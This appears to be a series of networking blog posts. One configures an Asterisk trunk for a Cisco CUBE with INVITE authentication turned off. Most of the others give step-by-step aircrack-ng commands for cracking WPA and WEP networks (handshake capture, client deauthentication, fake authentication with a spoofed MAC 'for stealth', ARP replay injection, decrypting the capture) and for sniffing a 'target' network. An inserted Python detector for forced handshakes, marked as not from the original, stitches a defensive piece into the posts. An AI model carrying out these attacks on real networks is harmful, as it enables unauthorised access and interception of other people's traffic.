Mar 19
Tom | Networking
As far as I can tell Cisco CUBE only supports unauthenticated SIP trunks, which isn’t too much trouble for Asterisk.
In sip.conf:
type=peer
host=x.x.x.x
context=trunks-inbound
allow=all
insecure=invite,port
trustrpid=yes
sendrpid=no
qualify=yes
(change ‘trunks-inbound’ to the necessary context)
In extensions.conf:
exten=>_0.,1,Set(CALLERID(num)=nnn-nnn-${CALLERID(num)})
exten=>_0.,n,Dial(SIP/x.x.x.x/${EXTEN:1})
exten=>_0.,n,Hangup
(First line is optional, and simply adds a prefix to the outgoing caller ID)
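The “insecure=invite,port” setting is the critical part, as the source port from the Cisco CUBE appears to be dynamic, unlike a traditional SIP trunk. The “port” value makes Asterisk match the peer by IP address regardless of source port, and “invite” stops it from challenging incoming INVITEs for authentication, so the “host=” address is the only thing that identifies the trunk.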
Mar 19
Tom | Linux General, Networking, Wireless
WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID and Channel number (-c option below)
- Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
- Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng)
- Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay-ng --deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 --ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
- Apply brute force: aircrack-ng -w password.lst capturefile.cap
- The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
- Stop monitor mode: airmon-ng stop mon0
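Seen from the network owner's side, the deauthentication step above leaves a recognisable trace: deauth frames aimed at a station, followed within seconds by that station's new 4-way handshake. The following is an added example, not code from the original post; the one-line-per-frame text format, the sample frames and the function names are assumptions made for the illustration.

```python
from collections import defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample, one frame per line: "seconds type bssid station".
# This text format is an assumption for the example, not any tool's output.
SAMPLE_FRAMES = """\
50.00 eapol 00:11:22:33:44:55 aa:aa:aa:aa:aa:aa
120.00 deauth 00:11:22:33:44:55 55:55:55:55:55:55
120.10 deauth 00:11:22:33:44:55 55:55:55:55:55:55
120.20 deauth 00:11:22:33:44:55 55:55:55:55:55:55
123.00 eapol 00:11:22:33:44:55 55:55:55:55:55:55
123.01 eapol 00:11:22:33:44:55 55:55:55:55:55:55
123.02 eapol
300.00 deauth 00:11:22:33:44:55 66:66:66:66:66:66
400.00 eapol 00:11:22:33:44:55 66:66:66:66:66:66
"""

def parse_frames(text):
    """Return (time, type, bssid, station) tuples, skipping malformed lines."""
    frames = []
    for line in text.splitlines():
        parts = line.lower().split()
        if len(parts) != 4:
            continue
        try:
            frames.append((float(parts[0]), parts[1], parts[2], parts[3]))
        except ValueError:
            continue
    return frames

def find_forced_handshakes(frames, window=10.0, min_deauths=1):
    """Alert when a station re-handshakes within `window` s of being deauthenticated."""
    deauths = defaultdict(list)  # bssid -> [(time, targeted station)]
    last_alert = {}              # (bssid, station) -> time of last alert
    alerts = []
    for ts, ftype, bssid, station in sorted(frames):
        if ftype == "deauth":
            deauths[bssid].append((ts, station))
        elif ftype == "eapol":
            # Deauths aimed at this station or at broadcast, recent enough to matter.
            hits = [t for t, target in deauths[bssid]
                    if target in (station, BROADCAST) and 0 <= ts - t <= window]
            key = (bssid, station)
            # The handshake is several EAPOL frames; alert once per window.
            if len(hits) >= min_deauths and ts - last_alert.get(key, float("-inf")) > window:
                last_alert[key] = ts
                alerts.append({"bssid": bssid, "station": station,
                               "deauths": len(hits), "handshake_at": ts})
    return alerts

if __name__ == "__main__":
    for alert in find_forced_handshakes(parse_frames(SAMPLE_FRAMES)):
        print(alert)
```

Ordinary roaming and reconnects also produce a deauth followed by a handshake, so raise min_deauths or correlate across several stations before treating an alert as hostile. Enabling Protected Management Frames (802.11w) makes clients ignore unauthenticated deauth frames.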
Mar 19
Tom | Linux General, Networking, Wireless
Using Debian Wheezy (testing) with an Intel Corporation Centrino Wireless-N 1000 card…
- Enter monitor mode: airmon-ng start wlan0
- Find nearby networks: airodump-ng mon0
- Identify the target BSSID, SSID and Channel number (-c option below)
- Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
- Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
  - aireplay-ng --fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one mon0
  - aireplay-ng --arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one -e SSID mon0
- When this sees an ARP packet, it will go like crazy injecting packets and you will see the “#Data” rapidly increasing in the airodump-ng window
- After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
- The WEP key should then be displayed in the terminal window.
- The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
- Exit monitor mode: airmon-ng stop mon0
Mar 17
Tom | Linux General, Networking, Wireless
This is easier and more effective than packet sniffing on a wired network:
- Set your WiFi card into monitoring mode: airmon-ng start wlan0
- See what’s around: airodump-ng mon0
- Select a target network, and note the BSSID value and channel (used as ‘-c’ option below)
- Collect the packet trace: airodump-ng -c 6 --bssid 00:12:34:56:78:90 -w output-file mon0
- Examine packet trace: wireshark output-file.cap
(run on Debian Wheezy [testing] using Intel Corporation Centrino Wireless-N 1000)
Mar 17
Tom | Linux General, Networking, Wireless
Very simple way to test if your WiFi card supports injection:
Put the card in monitor mode: airmon-ng start wlan0
Test using: aireplay-ng -9 mon0
With luck, the following output is displayed:
Trying broadcast probe requests…
Injection is working!
I am using Debian Wheezy (testing) with WiFi card:
Network controller: Intel Corporation Centrino Wireless-N 1000